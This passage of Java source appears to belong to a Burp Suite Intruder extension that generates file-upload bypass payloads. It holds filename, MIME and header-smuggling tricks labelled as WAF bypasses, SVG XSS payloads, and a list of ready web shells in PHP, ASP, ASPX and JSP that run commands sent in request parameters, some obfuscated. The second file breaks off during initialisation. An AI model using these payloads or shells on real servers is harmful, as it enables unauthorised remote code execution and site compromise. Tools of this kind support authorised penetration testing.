298 |             tempTemplateContentType = tempTemplateSuffix;
299 |             contentTypePayload.add(tempTemplateContentType.replace(contentType, "Content-Type: image/jpeg"));
300 | 
301 |             tempTemplateContentType = tempTemplateSuffix;
302 |             contentTypePayload.add(tempTemplateContentType.replace(contentType, "Content-Type: application/php"));
303 | 
304 |             tempTemplateContentType = tempTemplateSuffix;
305 |             contentTypePayload.add(tempTemplateContentType.replace(contentType, "Content-Type: text/plain"));
306 | 
307 |             tempTemplateContentType = tempTemplateSuffix;
308 |             contentTypePayload.add(tempTemplateContentType.replace(contentType, "Content-Type: text/javascript"));
309 | 
310 |             tempTemplateContentType = tempTemplateSuffix;
311 |             contentTypePayload.add(tempTemplateContentType.replace(contentType, ""));
312 | 
313 |             tempTemplateContentType = tempTemplateSuffix;
314 |             contentTypePayload.add(tempTemplateContentType.replace("Content-Type", "content-type"));
315 | 
316 |             tempTemplateContentType = tempTemplateSuffix;
317 |             contentTypePayload.add(tempTemplateContentType.replace("Content-Type: ", "Content-Type:  "));
318 | 
319 |             
320 |             tempTemplateContentType = tempTemplateSuffix;
321 |             contentTypePayload.add(tempTemplateContentType.replace(contentType, "Content-Type: image/png"));
322 | 
323 |             tempTemplateContentType = tempTemplateSuffix;
324 |             contentTypePayload.add(tempTemplateContentType.replace(contentType, "Content-Type: application/octet-stream"));
325 | 
326 |             tempTemplateContentType = tempTemplateSuffix;
327 |             contentTypePayload.add(tempTemplateContentType.replace(contentType, "Content-Type: multipart/form-data"));
328 | 
329 |             tempTemplateContentType = tempTemplateSuffix;
330 |             contentTypePayload.add(tempTemplateContentType.replace(contentType, "Content-Type: application/x-httpd-php"));
331 | 
332 |             tempTemplateContentType = tempTemplateSuffix;
333 |             contentTypePayload.add(tempTemplateContentType.replace(contentType, "Content-Type: application/x-asp"));
334 | 
335 |             tempTemplateContentType = tempTemplateSuffix;
336 |             contentTypePayload.add(tempTemplateContentType.replace(contentType, "Content-Type: video/mp4"));
337 |         }
338 | 
339 |         return contentTypePayload;
340 |     }
341 | 
342 |     private static List<String> windowsFeaturesFuzz(String template, String filenameSuffix) {
343 |         List<String> windowsPayload = new ArrayList<>();
344 |         List<String> suffix = Arrays.asList("php", "asp", "aspx", "jsp");
345 | 
346 |         for (String eachSuffix : suffix) {
347 |             String tempTemplate = template;
348 |             String tempTemplateSuffix = tempTemplate.replace(filenameSuffix, eachSuffix);
349 | 
350 |             
351 |             String tempTemplateNtfs = tempTemplateSuffix;
352 |             Pattern pattern = Pattern.compile("(filename=\".*\")");
353 |             Matcher matcher = pattern.matcher(tempTemplateNtfs);
354 |             if (matcher.find()) {
355 |                 String filenameTotal = matcher.group(1);
356 |                 windowsPayload.add(tempTemplateNtfs.replace(filenameTotal, "filename=\"zc." + eachSuffix + "::$DATA\""));
357 | 
358 |                 
359 |                 String tempTemplateIis = tempTemplateSuffix;
360 |                 windowsPayload.add(tempTemplateIis.replace(filenameTotal, "filename=\"zc." + eachSuffix + ";.jpg\""));
361 | 
362 |                 
363 |                 String tempTemplateAds = tempTemplateSuffix;
364 |                 windowsPayload.add(tempTemplateAds.replace(filenameTotal, "filename=\"zc:" + eachSuffix + "\""));
365 | 
366 |                 
367 |                 for (String device : Arrays.asList("con", "aux", "nul", "com1", "com2", "lpt1")) {
368 |                     String tempTemplateDevice = tempTemplateSuffix;
369 |                     windowsPayload.add(tempTemplateDevice.replace(filenameTotal, "filename=\"" + device + "." + eachSuffix + "\""));
370 |                 }
371 |             }
372 |         }
373 | 
374 |         return windowsPayload;
375 |     }
376 | 
377 |     private static List<String> linuxFeaturesFuzz(String template, String filenameSuffix) {
378 |         List<String> linuxPayload = new ArrayList<>();
379 |         List<String> suffix = Arrays.asList("php", "asp", "aspx", "jsp");
380 | 
381 |         for (String eachSuffix : suffix) {
382 |             String tempTemplate = template;
383 |             String tempTemplateSuffix = tempTemplate.replace(filenameSuffix, eachSuffix);
384 | 
385 |             
386 |             String tempTemplateApache = tempTemplateSuffix;
387 |             Pattern pattern = Pattern.compile("(filename=\".*\")");
388 |             Matcher matcher = pattern.matcher(tempTemplateApache);
389 |             if (matcher.find()) {
390 |                 String filenameTotal = matcher.group(1);
391 |                 linuxPayload.add(tempTemplateApache.replace(filenameTotal, "filename=\"zc." + eachSuffix + ".png\""));
392 | 
393 |                 
394 |                 String tempTemplateDot = tempTemplateSuffix;
395 |                 linuxPayload.add(tempTemplateDot.replace(filenameTotal, "filename=\"zc." + eachSuffix + ".\""));
396 | 
397 |                 
398 |                 String tempTemplatePath = tempTemplateSuffix;
399 |                 linuxPayload.add(tempTemplatePath.replace(filenameTotal, "filename=\"../zc." + eachSuffix + "\""));
400 | 
401 |                 
402 |                 for (String character : Arrays.asList("/", "\\", "?", "*", "|", ":", "\"", "<", ">")) {
403 |                     String tempTemplateSpecial = tempTemplateSuffix;
404 |                     linuxPayload.add(tempTemplateSpecial.replace(filenameTotal, "filename=\"zc" + character + "." + eachSuffix + "\""));
405 |                 }
406 |             }
407 |         }
408 | 
409 |         return linuxPayload;
410 |     }
411 | 
412 |     private static List<String> magicBytesFuzz(String template, String filenameSuffix) {
413 |         
414 |         List<String> magicBytesPayload = new ArrayList<>();
415 |         List<String> suffix = Arrays.asList("php", "asp", "aspx", "jsp");
416 | 
417 |         
418 |         String jpgMagic = "\\xff\\xd8\\xff\\xe0";  
419 |         String pngMagic = "\\x89PNG\\r\\n\\x1a\\n";  
420 |         String gifMagic = "GIF89a";  
421 |         String pdfMagic = "%PDF-1.5";  
422 | 
423 |         for (String eachSuffix : suffix) {
424 |             String tempTemplate = template;
425 |             String tempTemplateSuffix = tempTemplate.replace(filenameSuffix, eachSuffix);
426 | 
427 |             for (String magicByte : Arrays.asList(jpgMagic, pngMagic, gifMagic, pdfMagic)) {
428 |                 
429 |                 if (tempTemplateSuffix.contains("Content-Type:")) {
430 |                     Pattern pattern = Pattern.compile("Content-Type:.*", Pattern.DOTALL);
431 |                     Matcher matcher = pattern.matcher(tempTemplateSuffix);
432 |                     if (matcher.find()) {
433 |                         String contentTypeLine = matcher.group(0);
434 |                         String tempTemplateMagic = tempTemplateSuffix;
435 |                         magicBytesPayload.add(tempTemplateMagic.replace(contentTypeLine, contentTypeLine + "\r\n\r\n" + magicByte));
436 |                     }
437 |                 }
438 |             }
439 |         }
440 | 
441 |         return magicBytesPayload;
442 |     }
443 | 
444 |     private static List<String> fileContentTrickFuzz(String template, String filenameSuffix) {
445 |         
446 |         List<String> contentTrickPayload = new ArrayList<>();
447 |         List<String> suffix = Arrays.asList("php", "asp", "aspx", "jsp");
448 | 
449 |         for (String eachSuffix : suffix) {
450 |             String tempTemplate = template;
451 |             String tempTemplateSuffix = tempTemplate.replace(filenameSuffix, eachSuffix);
452 | 
453 |             
454 |             String tempTemplateGif = tempTemplateSuffix;
455 |             if (tempTemplateGif.contains("Content-Type:")) {
456 |                 Pattern pattern = Pattern.compile("Content-Type:.*", Pattern.DOTALL);
457 |                 Matcher matcher = pattern.matcher(tempTemplateGif);
458 |                 if (matcher.find()) {
459 |                     String contentTypeLine = matcher.group(0);
460 |                     contentTrickPayload.add(tempTemplateGif.replace(contentTypeLine, contentTypeLine + "\r\n\r\nGIF89a;"));
461 |                 }
462 |             }
463 | 
464 |             
465 |             String tempTemplatePhp = tempTemplateSuffix;
466 |             if (tempTemplatePhp.contains("Content-Type:") && eachSuffix.equals("php")) {
467 |                 Pattern pattern = Pattern.compile("Content-Type:.*", Pattern.DOTALL);
468 |                 Matcher matcher = pattern.matcher(tempTemplatePhp);
469 |                 if (matcher.find()) {
470 |                     String contentTypeLine = matcher.group(0);
471 |                     contentTrickPayload.add(tempTemplatePhp.replace(contentTypeLine, contentTypeLine + "\r\n\r\n<?php /*"));
472 |                 }
473 |             }
474 | 
475 |             
476 |             String tempTemplateSvg = tempTemplateSuffix;
477 |             if (tempTemplateSvg.contains("Content-Type:")) {
478 |                 Pattern pattern = Pattern.compile("Content-Type:.*", Pattern.DOTALL);
479 |                 Matcher matcher = pattern.matcher(tempTemplateSvg);
480 |                 if (matcher.find()) {
481 |                     String contentTypeLine = matcher.group(0);
482 |                     String svgHeader = "<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"100\" height=\"100\"></svg>";
483 |                     contentTrickPayload.add(tempTemplateSvg.replace(contentTypeLine, contentTypeLine + "\r\n" + svgHeader));
484 |                 }
485 |             }
486 |         }
487 | 
488 |         return contentTrickPayload;
489 |     }
490 | 
491 |     private static List<String> userIniFuzz(String template, String filenameSuffix) {
492 |         
493 |         List<String> userIniPayload = new ArrayList<>();
494 | 
495 |         
496 |         String tempTemplate = template;
497 |         String tempTemplateIni = tempTemplate.replace(filenameSuffix, "user.ini");
498 |         Pattern pattern = Pattern.compile("(filename=\".*\")");
499 |         Matcher matcher = pattern.matcher(tempTemplateIni);
500 |         if (matcher.find()) {
501 |             String filenameTotal = matcher.group(1);
502 |             userIniPayload.add(tempTemplateIni.replace(filenameTotal, "filename=\".user.ini\""));
503 |         }
504 | 
505 |         
506 |         tempTemplate = template;
507 |         String tempTemplateHtaccess = tempTemplate.replace(filenameSuffix, "htaccess");
508 |         pattern = Pattern.compile("(filename=\".*\")");
509 |         matcher = pattern.matcher(tempTemplateHtaccess);
510 |         if (matcher.find()) {
511 |             String filenameTotal = matcher.group(1);
512 |             userIniPayload.add(tempTemplateHtaccess.replace(filenameTotal, "filename=\".htaccess\""));
513 |         }
514 | 
515 |         
516 |         tempTemplate = template;
517 |         String tempTemplateWebconfig = tempTemplate.replace(filenameSuffix, "config");
518 |         pattern = Pattern.compile("(filename=\".*\")");
519 |         matcher = pattern.matcher(tempTemplateWebconfig);
520 |         if (matcher.find()) {
521 |             String filenameTotal = matcher.group(1);
522 |             userIniPayload.add(tempTemplateWebconfig.replace(filenameTotal, "filename=\"web.config\""));
523 |         }
524 | 
525 |         return userIniPayload;
526 |     }
527 | 
528 |     private static List<String> mimeEncodingFuzz(String template, String filenameSuffix) {
529 |         
530 |         List<String> mimePayload = new ArrayList<>();
531 |         List<String> suffix = Arrays.asList("php", "asp", "aspx", "jsp");
532 | 
533 |         for (String eachSuffix : suffix) {
534 |             String tempTemplate = template;
535 |             String tempTemplateSuffix = tempTemplate.replace(filenameSuffix, eachSuffix);
536 | 
537 |             
538 |             String tempTemplateMime = tempTemplateSuffix;
539 |             Pattern pattern = Pattern.compile("(filename=\".*\")");
540 |             Matcher matcher = pattern.matcher(tempTemplateMime);
541 |             if (matcher.find()) {
542 |                 String filenameTotal = matcher.group(1);
543 |                 mimePayload.add(tempTemplateMime.replace(filenameTotal, "filename=\"=?utf-8?Q?zc." + eachSuffix + "?=\""));
544 | 
545 |                 
546 |                 try {
547 |                     String encodedFilename = Base64.getEncoder().encodeToString(("zc." + eachSuffix).getBytes());
548 |                     String tempTemplateB64 = tempTemplateSuffix;
549 |                     mimePayload.add(tempTemplateB64.replace(filenameTotal, "filename=\"=?utf-8?B?" + encodedFilename + "?=\""));
550 | 
551 |                     
552 |                     String tempTemplateMixed = tempTemplateSuffix;
553 |                     mimePayload.add(tempTemplateMixed.replace(filenameTotal, "filename=\"=?utf-8?Q?zc=2E" + eachSuffix + "?=\""));
554 |                 } catch (Exception e) {
555 |                     
556 |                 }
557 |             }
558 |         }
559 | 
560 |         return mimePayload;
561 |     }
562 | 
563 |     private static List<String> httpProtocolSplitFuzz(String template, String filenameSuffix) {
564 |         
565 |         List<String> httpSplitPayload = new ArrayList<>();
566 |         List<String> suffix = Arrays.asList("php", "asp", "aspx", "jsp");
567 | 
568 |         for (String eachSuffix : suffix) {
569 |             String tempTemplate = template;
570 |             String tempTemplateSuffix = tempTemplate.replace(filenameSuffix, eachSuffix);
571 | 
572 |             
573 |             String tempTemplateMulti = tempTemplateSuffix;
574 |             if (tempTemplateMulti.contains("Content-Disposition:")) {
575 |                 Pattern pattern = Pattern.compile("(Content-Disposition:.*?filename=\".*?\")", Pattern.DOTALL);
576 |                 Matcher matcher = pattern.matcher(tempTemplateMulti);
577 |                 if (matcher.find()) {
578 |                     String contentDisp = matcher.group(1);
579 |                     Pattern namePattern = Pattern.compile("(name=\".*?\";)");
580 |                     Matcher nameMatcher = namePattern.matcher(contentDisp);
581 | 
582 |                     Pattern filenamePattern = Pattern.compile("(filename=\".*?\")");
583 |                     Matcher filenameMatcher = filenamePattern.matcher(contentDisp);
584 | 
585 |                     if (nameMatcher.find() && filenameMatcher.find()) {
586 |                         String namePart = nameMatcher.group(1);
587 |                         String filenamePart = filenameMatcher.group(1);
588 | 
589 |                         
590 |                         String newContent = contentDisp.replace(namePart + " " + filenamePart,
591 |                                 namePart + "\r\nContent-Disposition: " + filenamePart);
592 |                         httpSplitPayload.add(tempTemplateMulti.replace(contentDisp, newContent));
593 |                     }
594 |                 }
595 |             }
596 | 
597 |             
598 |             String tempTemplateSemicolon = tempTemplateSuffix;
599 |             if (tempTemplateSemicolon.contains("Content-Disposition:")) {
600 |                 Pattern pattern = Pattern.compile("(Content-Disposition:.*?filename=\".*?\")", Pattern.DOTALL);
601 |                 Matcher matcher = pattern.matcher(tempTemplateSemicolon);
602 |                 if (matcher.find()) {
603 |                     String contentDisp = matcher.group(1);
604 |                     String modifiedContent = contentDisp.replace("form-data;", "form-data;;;;");
605 |                     httpSplitPayload.add(tempTemplateSemicolon.replace(contentDisp, modifiedContent));
606 |                 }
607 |             }
608 |         }
609 | 
610 |         return httpSplitPayload;
611 |     }
612 | 
613 |     private static List<String> chunkedEncodingFuzz(String template, String filenameSuffix) {
614 |         
615 |         List<String> chunkedPayload = new ArrayList<>();
616 |         List<String> suffix = Arrays.asList("php", "asp", "aspx", "jsp");
617 | 
618 |         for (String eachSuffix : suffix) {
619 |             String tempTemplate = template;
620 |             String tempTemplateSuffix = tempTemplate.replace(filenameSuffix, eachSuffix);
621 | 
622 |             
623 |             if (tempTemplateSuffix.contains("Content-Type:")) {
624 |                 String tempTemplateChunked = tempTemplateSuffix;
625 |                 String chunkedHeader = "Transfer-Encoding: chunked\r\n";
626 |                 chunkedPayload.add(tempTemplateChunked.replace("Content-Type:", chunkedHeader + "Content-Type:"));
627 |             }
628 |         }
629 | 
630 |         return chunkedPayload;
631 |     }
632 | 
633 |     private static List<String> wafBypassFuzz(String template, String filenameSuffix) {
634 |         
635 |         List<String> wafBypassPayload = new ArrayList<>();
636 |         List<String> suffix = Arrays.asList("php", "asp", "aspx", "jsp");
637 | 
638 |         for (String eachSuffix : suffix) {
639 |             String tempTemplate = template;
640 |             String tempTemplateSuffix = tempTemplate.replace(filenameSuffix, eachSuffix);
641 | 
642 |             
643 |             String tempTemplateDoubleUrl = tempTemplateSuffix;
644 |             Pattern pattern = Pattern.compile("(filename=\".*\")");
645 |             Matcher matcher = pattern.matcher(tempTemplateDoubleUrl);
646 |             if (matcher.find()) {
647 |                 String filenameTotal = matcher.group(1);
648 |                 String doubleEncoded = "filename=\"zc.%252566ile\"";  
649 |                 wafBypassPayload.add(tempTemplateDoubleUrl.replace(filenameTotal, doubleEncoded));
650 |             }
651 | 
652 |             
653 |             String tempTemplatePollution = tempTemplateSuffix;
654 |             if (tempTemplatePollution.contains("Content-Disposition:")) {
655 |                 StringBuilder randomData = new StringBuilder();
656 |                 for (int i = 0; i < 1024; i++) {
657 |                     randomData.append((char) ('a' + (int) (Math.random() * 26)));
658 |                 }
659 |                 String randomComment = "X-Random-Data: " + randomData + "\r\n";
660 |                 wafBypassPayload.add(tempTemplatePollution.replace("Content-Disposition:", randomComment + "Content-Disposition:"));
661 |             }
662 |         }
663 | 
664 |         return wafBypassPayload;
665 |     }
666 | 
667 |     private static List<String> unicodeNormalizationFuzz(String template, String filenameSuffix) {
668 |         
669 |         List<String> unicodePayload = new ArrayList<>();
670 |         List<String> suffix = List.of("php");
671 | 
672 |         for (String eachSuffix : suffix) {
673 |             String tempTemplate = template;
674 |             String tempTemplateSuffix = tempTemplate.replace(filenameSuffix, eachSuffix);
675 | 
676 |             Pattern pattern = Pattern.compile("(filename=\".*\")");
677 |             Matcher matcher = pattern.matcher(tempTemplateSuffix);
678 |             if (matcher.find()) {
679 |                 String filenameTotal = matcher.group(1);
680 | 
681 |                 
682 |                 unicodePayload.add(tempTemplateSuffix.replace(filenameTotal, "filename=\"zc.\\u03c1hp\""));  
683 |                 unicodePayload.add(tempTemplateSuffix.replace(filenameTotal, "filename=\"zc.p\\u04bbp\""));  
684 |             }
685 |         }
686 | 
687 |         return unicodePayload;
688 |     }
689 | 
690 |     private static List<String> httpHeaderSmugglingFuzz(String template, String filenameSuffix) {
691 |         
692 |         List<String> headerSmugglingPayload = new ArrayList<>();
693 |         List<String> suffix = Arrays.asList("php", "asp", "aspx", "jsp");
694 | 
695 |         for (String eachSuffix : suffix) {
696 |             String tempTemplate = template;
697 |             String tempTemplateSuffix = tempTemplate.replace(filenameSuffix, eachSuffix);
698 | 
699 |             
700 |             if (tempTemplateSuffix.contains("Content-Type:")) {
701 |                 String tempTemplateHeader = tempTemplateSuffix;
702 |                 headerSmugglingPayload.add(tempTemplateHeader.replace("Content-Type:",
703 |                         "Content-Type: application/x-www-form-urlencoded\r\nContent-Type:"));
704 |             }
705 | 
706 |             
707 |             if (tempTemplateSuffix.contains("Content-Disposition:")) {
708 |                 String tempTemplateFolding = tempTemplateSuffix;
709 |                 String foldedContent = tempTemplateFolding.replace("Content-Disposition:", "Content-Disposition:\r\n ");
710 |                 headerSmugglingPayload.add(foldedContent);
711 |             }
712 | 
713 |             
714 |             if (tempTemplateSuffix.contains("Content-Disposition:")) {
715 |                 String tempTemplateSeparator = tempTemplateSuffix;
716 |                 for (String separator : Arrays.asList("\t", "\u000B", "\f")) {
717 |                     headerSmugglingPayload.add(tempTemplateSeparator.replace(": ", ":" + separator));
718 |                 }
719 |             }
720 |         }
721 | 
722 |         return headerSmugglingPayload;
723 |     }
724 | 
725 |     private static List<String> nullByteVariationsFuzz(String template, String filenameSuffix) {
726 |         
727 |         List<String> nullBytePayload = new ArrayList<>();
728 |         List<String> suffix = Arrays.asList("php", "asp");  
729 | 
730 |         
731 |         List<String> nullChars = Arrays.asList(
732 |                 "%00", "\\0", "\\x00"  
733 |         );
734 | 
735 |         for (String eachSuffix : suffix) {
736 |             String tempTemplate = template;
737 |             String tempTemplateSuffix = tempTemplate.replace(filenameSuffix, eachSuffix);
738 | 
739 |             Pattern pattern = Pattern.compile("(filename=\".*\")");
740 |             Matcher matcher = pattern.matcher(tempTemplateSuffix);
741 |             if (matcher.find()) {
742 |                 String filenameTotal = matcher.group(1);
743 | 
744 |                 for (String nullChar : nullChars) {
745 |                     nullBytePayload.add(tempTemplateSuffix.replace(filenameTotal,
746 |                             "filename=\"zc." + eachSuffix + nullChar + "jpg\""));
747 |                 }
748 |             }
749 |         }
750 | 
751 |         return nullBytePayload;
752 |     }
753 | 
754 |     private static List<String> protocolHandlerFuzz(String template, String filenameSuffix) {
755 |         
756 |         List<String> protocolPayload = new ArrayList<>();
757 |         List<String> suffix = Arrays.asList("php");  
758 | 
759 |         
760 |         List<String> protocols = Arrays.asList(
761 |                 "phar://", "zip://", "php://", "file://"
762 |         );
763 | 
764 |         for (String eachSuffix : suffix) {
765 |             String tempTemplate = template;
766 |             String tempTemplateSuffix = tempTemplate.replace(filenameSuffix, eachSuffix);
767 | 
768 |             Pattern pattern = Pattern.compile("(filename=\".*\")");
769 |             Matcher matcher = pattern.matcher(tempTemplateSuffix);
770 |             if (matcher.find()) {
771 |                 String filenameTotal = matcher.group(1);
772 | 
773 |                 for (String protocol : protocols) {
774 |                     protocolPayload.add(tempTemplateSuffix.replace(filenameTotal,
775 |                             "filename=\"" + protocol + "zc." + eachSuffix + "\""));
776 |                 }
777 |             }
778 |         }
779 | 
780 |         return protocolPayload;
781 |     }
782 | 
783 |     private static List<String> svgXssFuzz(String template, String filenameSuffix) {
784 |         
785 |         List<String> svgXssPayload = new ArrayList<>();
786 | 
787 |         String tempTemplate = template;
788 |         String tempTemplateSvg = tempTemplate.replace(filenameSuffix, "svg");
789 | 
790 |         if (tempTemplateSvg.contains("Content-Type:")) {
791 |             Pattern pattern = Pattern.compile("Content-Type:.*", Pattern.DOTALL);
792 |             Matcher matcher = pattern.matcher(tempTemplateSvg);
793 |             if (matcher.find()) {
794 |                 String contentTypeLine = matcher.group(0);
795 | 
796 |                 
797 |                 List<String> svgPayloads = Arrays.asList(
798 |                         "<svg xmlns=\"http://www.w3.org/2000/svg\"><script>alert(1)</script></svg>",
799 |                         "<svg xmlns=\"http://www.w3.org/2000/svg\"><use href=\"data:image/svg+xml;base64,PHN2ZyBpZD0idGVzdCIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj48c2NyaXB0PmFsZXJ0KDEpPC9zY3JpcHQ+PC9zdmc+#test\" /></svg>",
800 |                         "<svg xmlns=\"http://www.w3.org/2000/svg\"><a xmlns:xlink=\"http://www.w3.org/1999/xlink\" xlink:href=\"javascript:alert(1)\"><rect width=\"100\" height=\"100\" /></a></svg>"
801 |                 );
802 | 
803 |                 for (String payload : svgPayloads) {
804 |                     svgXssPayload.add(tempTemplateSvg.replace(contentTypeLine,
805 |                             contentTypeLine + "\r\n" + payload));
806 |                 }
807 |             }
808 |         }
809 | 
810 |         return svgXssPayload;
811 |     }
812 | 
813 |     private static List<String> webdavMethodFuzz(String template, String filenameSuffix) {
814 |         
815 |         List<String> webdavPayload = new ArrayList<>();
816 |         List<String> suffix = Arrays.asList("php", "asp", "aspx", "jsp");
817 | 
818 |         for (String eachSuffix : suffix) {
819 |             String tempTemplate = template;
820 |             String tempTemplateSuffix = tempTemplate.replace(filenameSuffix, eachSuffix);
821 | 
822 |             
823 |             String tempTemplateWebdav = tempTemplateSuffix;
824 |             String webdavHeaders = "Destination: file:///var/www/html/evil." + eachSuffix + "\r\nOverwrite: T\r\n";
825 | 
826 |             if (tempTemplateWebdav.contains("Content-Type:")) {
827 |                 webdavPayload.add(tempTemplateWebdav.replace("Content-Type:",
828 |                         webdavHeaders + "Content-Type:"));
829 |             }
830 |         }
831 | 
832 |         return webdavPayload;
833 |     }
834 | 
835 |     private static List<String> fileContentBypassFuzz(String template, String filenameSuffix) {
836 |         
837 |         List<String> contentBypassPayload = new ArrayList<>();
838 | 
839 |         
840 |         Pattern originalContentPattern = Pattern.compile("Content-Type:.*?\\r\\n\\r\\n(.*?)(?:\\r\\n-{10,})", Pattern.DOTALL);
841 |         Matcher originalContentMatcher = originalContentPattern.matcher(template);
842 |         String originalContent = "";
843 |         String contentPart = null;
844 | 
845 |         if (originalContentMatcher.find()) {
846 |             originalContent = originalContentMatcher.group(1);
847 |             
848 |             contentPart = originalContentMatcher.group(0);
849 |         }
850 | 
851 |         
852 |         List<String> phpContents = Arrays.asList(
853 |                 "<?php eval($_POST[\"cmd\"]); ?>",
854 |                 "<?php system($_REQUEST[\"cmd\"]); ?>",
855 |                 "<?= `$_GET[0]`; ?>",  
856 |                 "<?php $_GET[a](base64_decode($_GET[b])); ?>",  
857 |                 "<?php $a=chr(97).chr(115).chr(115).chr(101).chr(114).chr(116);$a($_POST[x]); ?>",  
858 |                 "<?php include $_GET[\"file\"]; ?>",  
859 |                 "<?php preg_replace(\"/.*/e\",base64_decode($_POST[\"x\"]),\"\"); ?>",  
860 |                 "<?php $_=\"{\"; $_=($_^\"<\").($_^\">\").($_^\"/\"); ?><?php ${$_}[_]($_POST[x]);?>",  
861 |                 "<script language=\"php\">eval($_POST[\"cmd\"]);</script>"  
862 |         );
863 | 
864 |         
865 |         List<String> aspContents = Arrays.asList(
866 |                 "<%eval request(\"cmd\")%>",  
867 |                 "<%execute request(\"cmd\")%>",  
868 |                 "<%response.write CreateObject(\"WScript.Shell\").exec(request(\"cmd\")).StdOut.ReadAll()%>",  
869 |                 "<%execute(request(\"cmd\"))%>",  
870 |                 "<%eval(Replace(chr(112)+chr(97)+chr(115)+chr(115),chr(112)+chr(97)+chr(115)+chr(115),request(\"cmd\")))%>"  
871 |         );
872 | 
873 |         
874 |         List<String> aspxContents = Arrays.asList(
875 |                 "<%@ Page Language=\"C#\" %><%System.Diagnostics.Process.Start(\"cmd.exe\",\"/c \"+Request[\"cmd\"]);%>",
876 |                 "<%@ Page Language=\"C#\" %><%eval(Request.Item[\"cmd\"]);%>",
877 |                 "<%@ Page Language=\"C#\" %><% System.IO.StreamWriter sw=new System.IO.StreamWriter(Request.Form[\"f\"]);sw.Write(Request.Form[\"c\"]);sw.Close(); %>",
878 |                 "<%@ Page Language=\"Jscript\"%><%eval(Request.Item[\"cmd\"],\"unsafe\");%>"
879 |         );
880 | 
881 |         
882 |         List<String> jspContents = Arrays.asList(
883 |                 "<%Runtime.getRuntime().exec(request.getParameter(\"cmd\"));%>",
884 |                 "<%=Runtime.getRuntime().exec(request.getParameter(\"cmd\"))%>",
885 |                 "<% out.println(\"Output: \" + request.getParameter(\"cmd\")); %>",
886 |                 "<%! public void jspInit(){ try{ java.lang.Runtime.getRuntime().exec(request.getParameter(\"cmd\")); }catch(Exception e){} } %>"
887 |         );
888 | 
889 |         
890 |         List<String> wafEvasionPrefixes = Arrays.asList(
891 |                 "GIF89a;\n",  
892 |                 "#!MIME type image/gif\n",  
893 |                 "<!--\n", 
894 |                 ";base64,\n",  
895 |                 "BM\n",  
896 |                 "%PDF-1.5\n",  
897 |                 "ID3\n"  
898 |         );
899 | 
900 |         
901 |         for (String ext : Arrays.asList("php", "asp", "aspx", "jsp")) {
902 |             String tempTemplate = template;
903 |             String tempTemplateSuffix = tempTemplate.replace(filenameSuffix, ext);
904 | 
905 |             
906 |             List<String> contents;
907 |             if (ext.equals("php")) {
908 |                 contents = phpContents;
909 |             } else if (ext.equals("asp")) {
910 |                 contents = aspContents;
911 |             } else if (ext.equals("aspx")) {
912 |                 contents = aspxContents;
913 |             } else {
914 |                 contents = jspContents;
915 |             }
916 | 
917 |             
918 |             for (int i = 0; i < Math.min(2, contents.size()); i++) {  
919 |                 String content = contents.get(i);
920 |                 if (contentPart != null && originalContent != null && !originalContent.isEmpty()) {
921 |                     
922 |                     String newContent = contentPart.replace(originalContent, content);
923 |                     contentBypassPayload.add(tempTemplateSuffix.replace(contentPart, newContent));
924 | 
925 |                     
926 |                     for (int j = 0; j < Math.min(3, wafEvasionPrefixes.size()); j++) {
927 |                         String prefix = wafEvasionPrefixes.get(j);
928 |                         String newContentWithPrefix = contentPart.replace(originalContent, prefix + content);
929 |                         contentBypassPayload.add(tempTemplateSuffix.replace(contentPart, newContentWithPrefix));
930 |                     }
931 | 
932 |                     
933 |                     if (ext.equals("php")) {
934 |                         String newContentWithComment = contentPart.replace(originalContent, "/*\n*/\n" + content);
935 |                         contentBypassPayload.add(tempTemplateSuffix.replace(contentPart, newContentWithComment));
936 | 
937 |                         String newContentWithNewline = contentPart.replace(originalContent, content.replace("<?php", "<?php\n"));
938 |                         contentBypassPayload.add(tempTemplateSuffix.replace(contentPart, newContentWithNewline));
939 |                     }
940 | 
941 |                     
942 |                     if (ext.equals("asp") || ext.equals("aspx")) {
943 |                         String newContentWithComment = contentPart.replace(originalContent, "<!-- -->" + content);
944 |                         contentBypassPayload.add(tempTemplateSuffix.replace(contentPart, newContentWithComment));
945 |                     }
946 |                 } else {
947 |                     
948 |                     contentBypassPayload.add(tempTemplateSuffix);
949 |                 }
950 |             }
951 |         }
952 | 
953 |         return contentBypassPayload;
954 |     }
955 | 
956 |     private static List<String> removeDuplicates(List<String> list) {
957 |         Set<String> set = new HashSet<>(list);
958 |         return new ArrayList<>(set);
959 |     }
960 | }


--------------------------------------------------------------------------------
/src/main/java/UploadFuzzer.java:
--------------------------------------------------------------------------------
  1 | import burp.IBurpExtenderCallbacks;
  2 | import burp.IExtensionHelpers;
  3 | import burp.IIntruderAttack;
  4 | import burp.IIntruderPayloadGenerator;
  5 | 
  6 | import java.util.ArrayList;
  7 | import java.util.HashSet;
  8 | import java.util.List;
  9 | import java.util.Set;
 10 | import java.util.regex.Matcher;
 11 | import java.util.regex.Pattern;
 12 | 
 13 | public class UploadFuzzer implements IIntruderPayloadGenerator {
 14 |     private final IExtensionHelpers helpers;
 15 |     private final IIntruderAttack attack;
 16 |     private int payloadIndex = 0;
 17 |     private List<String> attackPayloads = new ArrayList<>();
 18 |     private boolean initialized = false;
 19 | 
 20 |     private final IBurpExtenderCallbacks callbacks;
 21 | 
 22 |     public UploadFuzzer(IExtensionHelpers helpers, IIntruderAttack attack, IBurpExtenderCallbacks callbacks) { // 添加callbacks参数
 23 |         this.helpers = helpers;
 24 |         this.attack = attack;
 25 |         this.callbacks = callbacks;
 26 |     }
 27 | 
 28 |     @Override
 29 |     public boolean hasMorePayloads() {
 30 |         if (!initialized) {
 31 |             return true;
 32 |         }
 33 | 
 34 |         return payloadIndex < attackPayloads.size();
 35 |     }
 36 | 
 37 |     @Override
 38 |     public byte[] getNextPayload(byte[] baseValue) {
 39 |         if (!initialized) {
 40 |             callbacks.printOutput("开始初始化payload..."); // 添加调试信息
 41 |             initializePayloads(baseValue);
 42 |             initialized = true;
 43 |             callbacks.printOutput("初始化完成，共生成 " + attackPayloads.size() + " 个payload"); // 添加调试信息
 44 |         }
 45 | 
 46 |         if (payloadIndex >= attackPayloads.size()) {
 47 |             return baseValue;
 48 |         }
 49 | 
 50 |         String payload = attackPayloads.get(payloadIndex);
 51 |         payloadIndex++;
 52 |         return payload.getBytes();
 53 |     }
 54 | 
 55 |     private void initializePayloads(byte[] baseValue) {
 56 |         String selectedArea = new String(baseValue);
 57 |         
 58 |         boolean isFullSection = selectedArea.contains("Content-Disposition:") &&
 59 |                 (selectedArea.contains("filename=") || selectedArea.contains("filename=\"")) &&
 60 |                 selectedArea.contains("Content-Type:");
 61 |         
